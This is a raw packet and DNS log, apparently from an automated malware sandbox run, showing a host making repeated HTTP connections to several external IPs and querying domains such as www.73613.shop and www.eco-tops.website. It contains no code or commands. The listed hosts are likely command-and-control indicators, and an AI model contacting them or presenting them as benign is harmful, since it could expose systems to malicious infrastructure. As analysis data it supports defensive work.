                                                                            Dec 10, 2024 16:26:06.098093987 CET5000480192.168.2.523.167.152.41
                                                                            Dec 10, 2024 16:26:06.110238075 CET5000480192.168.2.523.167.152.41
                                                                            Dec 10, 2024 16:26:06.230545998 CET805000423.167.152.41192.168.2.5
                                                                            Dec 10, 2024 16:26:06.996220112 CET805000423.167.152.41192.168.2.5
                                                                            Dec 10, 2024 16:26:06.996278048 CET5000480192.168.2.523.167.152.41
                                                                            Dec 10, 2024 16:26:07.614012957 CET5000480192.168.2.523.167.152.41
                                                                            Dec 10, 2024 16:26:07.733375072 CET805000423.167.152.41192.168.2.5
                                                                            Dec 10, 2024 16:26:08.638266087 CET5000580192.168.2.523.167.152.41
                                                                            Dec 10, 2024 16:26:08.764569998 CET805000523.167.152.41192.168.2.5
                                                                            Dec 10, 2024 16:26:08.764684916 CET5000580192.168.2.523.167.152.41
                                                                            Dec 10, 2024 16:26:08.778256893 CET5000580192.168.2.523.167.152.41
                                                                            Dec 10, 2024 16:26:08.897763968 CET805000523.167.152.41192.168.2.5
                                                                            Dec 10, 2024 16:26:08.897778034 CET805000523.167.152.41192.168.2.5
                                                                            Dec 10, 2024 16:26:09.657939911 CET805000523.167.152.41192.168.2.5
                                                                            Dec 10, 2024 16:26:09.658023119 CET5000580192.168.2.523.167.152.41
                                                                            Dec 10, 2024 16:26:10.286278963 CET5000580192.168.2.523.167.152.41
                                                                            Dec 10, 2024 16:26:10.405761957 CET805000523.167.152.41192.168.2.5
                                                                            Dec 10, 2024 16:26:11.305443048 CET5000680192.168.2.523.167.152.41
                                                                            Dec 10, 2024 16:26:11.514919996 CET805000623.167.152.41192.168.2.5
                                                                            Dec 10, 2024 16:26:11.515029907 CET5000680192.168.2.523.167.152.41
                                                                            Dec 10, 2024 16:26:11.524070024 CET5000680192.168.2.523.167.152.41
                                                                            Dec 10, 2024 16:26:11.643485069 CET805000623.167.152.41192.168.2.5
                                                                            Dec 10, 2024 16:26:12.510463953 CET805000623.167.152.41192.168.2.5
                                                                            Dec 10, 2024 16:26:12.510591030 CET5000680192.168.2.523.167.152.41
                                                                            Dec 10, 2024 16:26:12.512280941 CET5000680192.168.2.523.167.152.41
                                                                            Dec 10, 2024 16:26:12.631845951 CET805000623.167.152.41192.168.2.5
                                                                            Dec 10, 2024 16:26:18.282540083 CET5000780192.168.2.5178.79.184.196
                                                                            Dec 10, 2024 16:26:18.407552004 CET8050007178.79.184.196192.168.2.5
                                                                            Dec 10, 2024 16:26:18.408590078 CET5000780192.168.2.5178.79.184.196
                                                                            Dec 10, 2024 16:26:18.420305967 CET5000780192.168.2.5178.79.184.196
                                                                            Dec 10, 2024 16:26:18.539577961 CET8050007178.79.184.196192.168.2.5
                                                                            Dec 10, 2024 16:26:19.926376104 CET5000780192.168.2.5178.79.184.196
                                                                            Dec 10, 2024 16:26:20.047137022 CET8050007178.79.184.196192.168.2.5
                                                                            Dec 10, 2024 16:26:20.050421000 CET5000780192.168.2.5178.79.184.196
                                                                            Dec 10, 2024 16:26:20.945914030 CET5000880192.168.2.5178.79.184.196
                                                                            Dec 10, 2024 16:26:21.066070080 CET8050008178.79.184.196192.168.2.5
                                                                            Dec 10, 2024 16:26:21.066159010 CET5000880192.168.2.5178.79.184.196
                                                                            Dec 10, 2024 16:26:21.081820965 CET5000880192.168.2.5178.79.184.196
                                                                            Dec 10, 2024 16:26:21.201214075 CET8050008178.79.184.196192.168.2.5
                                                                            Dec 10, 2024 16:26:22.600328922 CET5000880192.168.2.5178.79.184.196
                                                                            Dec 10, 2024 16:26:22.720355034 CET8050008178.79.184.196192.168.2.5
                                                                            Dec 10, 2024 16:26:22.720421076 CET5000880192.168.2.5178.79.184.196
                                                                            Dec 10, 2024 16:26:23.618009090 CET5000980192.168.2.5178.79.184.196
                                                                            Dec 10, 2024 16:26:23.738310099 CET8050009178.79.184.196192.168.2.5
                                                                            Dec 10, 2024 16:26:23.738396883 CET5000980192.168.2.5178.79.184.196
                                                                            Dec 10, 2024 16:26:23.752264023 CET5000980192.168.2.5178.79.184.196
                                                                            Dec 10, 2024 16:26:23.873110056 CET8050009178.79.184.196192.168.2.5
                                                                            Dec 10, 2024 16:26:23.873292923 CET8050009178.79.184.196192.168.2.5
                                                                            Dec 10, 2024 16:26:25.254544020 CET5000980192.168.2.5178.79.184.196
                                                                            Dec 10, 2024 16:26:25.383502007 CET8050009178.79.184.196192.168.2.5
                                                                            Dec 10, 2024 16:26:25.383580923 CET5000980192.168.2.5178.79.184.196
                                                                            Dec 10, 2024 16:26:26.276303053 CET5001080192.168.2.5178.79.184.196
                                                                            Dec 10, 2024 16:26:26.395787001 CET8050010178.79.184.196192.168.2.5
                                                                            Dec 10, 2024 16:26:26.395908117 CET5001080192.168.2.5178.79.184.196
                                                                            Dec 10, 2024 16:26:26.404894114 CET5001080192.168.2.5178.79.184.196
                                                                            Dec 10, 2024 16:26:26.526845932 CET8050010178.79.184.196192.168.2.5
                                                                            Dec 10, 2024 16:26:32.875821114 CET8050010178.79.184.196192.168.2.5
                                                                            Dec 10, 2024 16:26:32.876219034 CET8050010178.79.184.196192.168.2.5
                                                                            Dec 10, 2024 16:26:32.876348972 CET5001080192.168.2.5178.79.184.196
                                                                            Dec 10, 2024 16:26:32.884429932 CET5001080192.168.2.5178.79.184.196
                                                                            Dec 10, 2024 16:26:33.003869057 CET8050010178.79.184.196192.168.2.5
                                                                            Dec 10, 2024 16:26:39.025959015 CET5001180192.168.2.545.79.252.94
                                                                            Dec 10, 2024 16:26:39.146110058 CET805001145.79.252.94192.168.2.5
                                                                            Dec 10, 2024 16:26:39.146193981 CET5001180192.168.2.545.79.252.94
                                                                            Dec 10, 2024 16:26:39.159554958 CET5001180192.168.2.545.79.252.94
                                                                            Dec 10, 2024 16:26:39.279916048 CET805001145.79.252.94192.168.2.5
                                                                            Dec 10, 2024 16:26:40.405989885 CET805001145.79.252.94192.168.2.5
                                                                            Dec 10, 2024 16:26:40.406110048 CET805001145.79.252.94192.168.2.5
                                                                            Dec 10, 2024 16:26:40.406311989 CET5001180192.168.2.545.79.252.94
                                                                            Dec 10, 2024 16:26:40.676340103 CET5001180192.168.2.545.79.252.94
                                                                            Dec 10, 2024 16:26:41.695879936 CET5001280192.168.2.545.79.252.94
                                                                            Dec 10, 2024 16:26:41.815382004 CET805001245.79.252.94192.168.2.5
                                                                            Dec 10, 2024 16:26:41.815464973 CET5001280192.168.2.545.79.252.94
                                                                            Dec 10, 2024 16:26:41.828942060 CET5001280192.168.2.545.79.252.94
                                                                            Dec 10, 2024 16:26:41.948410034 CET805001245.79.252.94192.168.2.5
                                                                            Dec 10, 2024 16:26:43.018282890 CET805001245.79.252.94192.168.2.5
                                                                            Dec 10, 2024 16:26:43.018441916 CET805001245.79.252.94192.168.2.5
                                                                            Dec 10, 2024 16:26:43.018496990 CET5001280192.168.2.545.79.252.94
                                                                            Dec 10, 2024 16:26:43.332602024 CET5001280192.168.2.545.79.252.94
                                                                            Dec 10, 2024 16:26:44.352088928 CET5001380192.168.2.545.79.252.94
                                                                            Dec 10, 2024 16:26:44.471765041 CET805001345.79.252.94192.168.2.5
                                                                            Dec 10, 2024 16:26:44.471913099 CET5001380192.168.2.545.79.252.94
                                                                            Dec 10, 2024 16:26:44.484082937 CET5001380192.168.2.545.79.252.94
                                                                            Dec 10, 2024 16:26:44.603653908 CET805001345.79.252.94192.168.2.5
                                                                            Dec 10, 2024 16:26:44.603846073 CET805001345.79.252.94192.168.2.5
                                                                            Dec 10, 2024 16:26:45.675806999 CET805001345.79.252.94192.168.2.5
                                                                            Dec 10, 2024 16:26:45.675965071 CET805001345.79.252.94192.168.2.5
                                                                            Dec 10, 2024 16:26:45.676024914 CET5001380192.168.2.545.79.252.94
                                                                            Dec 10, 2024 16:26:45.988936901 CET5001380192.168.2.545.79.252.94
                                                                            Dec 10, 2024 16:26:47.008857012 CET5001480192.168.2.545.79.252.94
                                                                            Dec 10, 2024 16:26:47.128364086 CET805001445.79.252.94192.168.2.5
                                                                            Dec 10, 2024 16:26:47.128453016 CET5001480192.168.2.545.79.252.94
                                                                            Dec 10, 2024 16:26:47.138627052 CET5001480192.168.2.545.79.252.94
                                                                            Dec 10, 2024 16:26:47.258568048 CET805001445.79.252.94192.168.2.5
                                                                            Dec 10, 2024 16:26:48.335143089 CET805001445.79.252.94192.168.2.5
                                                                            Dec 10, 2024 16:26:48.335160971 CET805001445.79.252.94192.168.2.5
                                                                            Dec 10, 2024 16:26:48.335377932 CET5001480192.168.2.545.79.252.94
                                                                            Dec 10, 2024 16:26:48.337982893 CET5001480192.168.2.545.79.252.94
                                                                            Dec 10, 2024 16:26:48.457530022 CET805001445.79.252.94192.168.2.5
                                                                            Dec 10, 2024 16:27:02.424437046 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:02.543752909 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:02.549700975 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:02.812504053 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:02.932004929 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:03.925805092 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:03.925899029 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:03.925909996 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:03.926116943 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:03.926188946 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:03.926259995 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:03.926498890 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:03.926512003 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:03.926532030 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:03.926559925 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:03.927342892 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:03.927364111 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:03.927381039 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:03.927418947 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:03.927440882 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:04.045502901 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.045569897 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.045727015 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:04.050055027 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.050137043 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.050240040 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:04.118630886 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.118838072 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.118892908 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:04.122704029 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.122741938 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.122806072 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:04.131078959 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.131170988 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.131220102 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:04.139622927 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.139688015 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.139739990 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:04.148289919 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.148350000 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.148416042 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:04.156598091 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.156673908 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.156774044 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:04.165055990 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.165265083 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.165326118 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:04.173515081 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.173621893 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.173691988 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:04.182168961 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.182353973 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.182424068 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:04.190609932 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.190696001 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.190762997 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:04.198457956 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.198620081 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.198723078 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:04.206692934 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.206950903 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.207016945 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:04.310410976 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.310442924 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.310496092 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:04.311769009 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.312355995 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.312413931 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:04.316586018 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.316704988 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.316761971 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:04.317069054 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:04.321432114 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.321491003 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:04.321517944 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.321563005 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:04.326227903 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.326303005 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:04.326308966 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.326371908 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:04.331007004 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.331065893 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:04.331073999 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.331124067 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:04.335691929 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.335747957 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:04.335777998 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.335819006 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:04.340441942 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.340493917 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:04.340527058 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.340569019 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:04.345006943 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.345055103 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:04.345082045 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.345118046 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:04.349657059 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.349723101 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.349733114 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:04.349765062 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:04.354202032 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.354253054 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:04.354254961 CET805001531.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:04.354301929 CET5001580192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:06.025970936 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:06.147397041 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:06.147497892 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:06.158276081 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:06.277826071 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.551311016 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.551563025 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.551574945 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.551628113 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:07.551759005 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.551784039 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.551836967 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:07.552292109 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.552304029 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.552323103 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.552331924 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.552352905 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:07.552385092 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:07.552869081 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.552918911 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:07.671237946 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.671545982 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.671612978 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:07.675440073 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.675539970 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.675585032 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:07.683964014 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.738801003 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:07.743299961 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.743546009 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.743838072 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:07.747370005 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.747486115 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.747663975 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:07.755827904 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.758903980 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.758972883 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:07.758989096 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.767689943 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.767759085 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:07.767864943 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.775847912 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.775908947 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:07.776000977 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.784358025 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.784425974 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:07.784440041 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.792778015 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.792856932 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:07.792911053 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.801296949 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.801373959 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:07.801413059 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.809751987 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.809797049 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.809823990 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:07.818186045 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.818326950 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.818418026 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:07.826189995 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.826255083 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:07.826302052 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.858206034 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.858278990 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:07.981132984 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.981286049 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.981359959 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:07.983218908 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.983392000 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.983591080 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:07.986685991 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.986859083 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.987003088 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:07.991355896 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.991489887 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.991556883 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:07.995829105 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.995915890 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:07.995981932 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:08.000296116 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:08.000488043 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:08.001897097 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:08.004945993 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:08.005100965 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:08.005153894 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:08.009460926 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:08.009589911 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:08.009717941 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:08.014067888 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:08.014381886 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:08.014431953 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:08.018527031 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:08.018660069 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:08.018707037 CET5001680192.168.2.531.31.198.145
                                                                            Dec 10, 2024 16:27:08.023117065 CET805001631.31.198.145192.168.2.5
                                                                            Dec 10, 2024 16:27:08.023977995 CET5001680192.168.2.531.31.198.145
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Dec 10, 2024 16:23:42.577820063 CET6220853192.168.2.51.1.1.1
                                                                            Dec 10, 2024 16:23:43.233179092 CET53622081.1.1.1192.168.2.5
                                                                            Dec 10, 2024 16:23:59.553280115 CET5450653192.168.2.51.1.1.1
                                                                            Dec 10, 2024 16:23:59.872495890 CET53545061.1.1.1192.168.2.5
                                                                            Dec 10, 2024 16:24:14.636581898 CET5972753192.168.2.51.1.1.1
                                                                            Dec 10, 2024 16:24:15.087203026 CET53597271.1.1.1192.168.2.5
                                                                            Dec 10, 2024 16:24:29.445977926 CET6434053192.168.2.51.1.1.1
                                                                            Dec 10, 2024 16:24:30.442056894 CET6434053192.168.2.51.1.1.1
                                                                            Dec 10, 2024 16:24:30.498300076 CET53643401.1.1.1192.168.2.5
                                                                            Dec 10, 2024 16:24:30.580530882 CET53643401.1.1.1192.168.2.5
                                                                            Dec 10, 2024 16:24:44.962354898 CET5857653192.168.2.51.1.1.1
                                                                            Dec 10, 2024 16:24:45.915019989 CET53585761.1.1.1192.168.2.5
                                                                            Dec 10, 2024 16:25:00.179809093 CET5038653192.168.2.51.1.1.1
                                                                            Dec 10, 2024 16:25:00.687053919 CET53503861.1.1.1192.168.2.5
                                                                            Dec 10, 2024 16:25:24.214154005 CET6528153192.168.2.51.1.1.1
                                                                            Dec 10, 2024 16:25:24.654818058 CET53652811.1.1.1192.168.2.5
                                                                            Dec 10, 2024 16:25:45.806879044 CET6440853192.168.2.51.1.1.1
                                                                            Dec 10, 2024 16:25:46.820292950 CET6440853192.168.2.51.1.1.1
                                                                            Dec 10, 2024 16:25:46.917283058 CET53644081.1.1.1192.168.2.5
                                                                            Dec 10, 2024 16:25:46.958142996 CET53644081.1.1.1192.168.2.5
                                                                            Dec 10, 2024 16:26:01.571108103 CET6432153192.168.2.51.1.1.1
                                                                            Dec 10, 2024 16:26:02.582622051 CET6432153192.168.2.51.1.1.1
                                                                            Dec 10, 2024 16:26:03.294172049 CET53643211.1.1.1192.168.2.5
                                                                            Dec 10, 2024 16:26:03.294214964 CET53643211.1.1.1192.168.2.5
                                                                            Dec 10, 2024 16:26:17.524209976 CET6203253192.168.2.51.1.1.1
                                                                            Dec 10, 2024 16:26:18.279344082 CET53620321.1.1.1192.168.2.5
                                                                            Dec 10, 2024 16:26:37.900413990 CET6250653192.168.2.51.1.1.1
                                                                            Dec 10, 2024 16:26:38.895178080 CET6250653192.168.2.51.1.1.1
                                                                            Dec 10, 2024 16:26:39.021040916 CET53625061.1.1.1192.168.2.5
                                                                            Dec 10, 2024 16:26:39.032732010 CET53625061.1.1.1192.168.2.5
                                                                            Dec 10, 2024 16:26:53.352015972 CET5098753192.168.2.51.1.1.1
                                                                            Dec 10, 2024 16:26:53.759470940 CET53509871.1.1.1192.168.2.5
                                                                            Dec 10, 2024 16:27:01.856993914 CET6353053192.168.2.51.1.1.1
                                                                            Dec 10, 2024 16:27:02.340205908 CET53635301.1.1.1192.168.2.5
                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Dec 10, 2024 16:23:42.577820063 CET192.168.2.51.1.1.10xb5e6Standard query (0)www.regents.healthA (IP address)IN (0x0001)false
                                                                            Dec 10, 2024 16:23:59.553280115 CET192.168.2.51.1.1.10x655cStandard query (0)www.73613.shopA (IP address)IN (0x0001)false
                                                                            Dec 10, 2024 16:24:14.636581898 CET192.168.2.51.1.1.10x5786Standard query (0)www.eco-tops.websiteA (IP address)IN (0x0001)false
